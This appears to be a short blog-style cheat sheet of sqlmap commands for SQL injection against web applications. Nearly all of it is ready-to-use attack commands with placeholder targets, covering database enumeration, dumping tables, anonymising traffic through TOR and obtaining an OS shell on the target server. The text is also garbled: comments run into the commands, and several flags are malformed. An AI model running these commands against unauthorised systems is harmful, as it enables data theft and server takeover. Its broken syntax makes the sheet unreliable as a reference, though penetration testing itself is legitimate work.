Here is a quick cheat sheet for Web application pen testing with sqlmap:
# Simple usage
sqlmap -u “http://<TARGET-SERVER>/”bash# Specify target DBMS to MySQL
sqlmap -u “http://<TARGET-SERVER>/” --dbms=mysql# Using a proxy
sqlmap -u “http://<TARGET-SERVER>/” --proxy=http://<PROXY-ADDRESS>:<PORT># Specify param1 to exploit
sqlmap -u “http://<TARGET-SERVER>/<PARAM1>=<VALUE1>&<PARAM2>=<VALUE2>” -p <PARAM1># Use POST requests
sqlmap -u “http://<TARGET-SERVER>/” --data=<PARAM1>=<VALUE1>&<PARAM2>=<VALUE2># Access with authenticated session
sqlmap -u “http://<TARGET-SERVER>/” --data=<PARAM1>=<VALUE1>&<PARAM2>=value2 -p <PARAM1>cookie=’<COOKIE-VALUE>’# Basic authentication
sqlmap -u “http://<TARGET-SERVER>/” -s-data=<PARAM1>=<VALUE1>&<PARAM2>=<VALUE2> -p <PARAM1> --auth-type=basic --auth-cred=<USERNAME>:<PASSWORD># Evaluating response strings
sqlmap -u “http://<TARGET-SERVER>/” --string=”This string if query is TRUE”
sqlmap -u “http://<TARGET-SERVER>/” --not-string=”This string if query is FALSE”# List databases
sqlmap -u “http://<TARGET-SERVER>/” --dbs# List tables of database target_DB
sqlmap -u “http://<TARGET-SERVER>/” -D <TARGET-DB> --tables# Dump table target_Table of database target_DB
sqlmap -u “http://<TARGET-SERVER>/” -D <TARGET-DB> -T <TARGET-TABLE> -dump# List columns of table target_Table of database target_DB
sqlmap -u “http://<TARGET-SERVER>/” -D <TARGET-DB> -T <TARGET-TABLE> --columns# Scan through TOR
sqlmap -u “http://<TARGET-SERVER>/” --tor --tor-type=SOCKS5# Get OS Shell
sqlmap -u “http://<TARGET-SERVER>/” --os-shellLink to my original post:
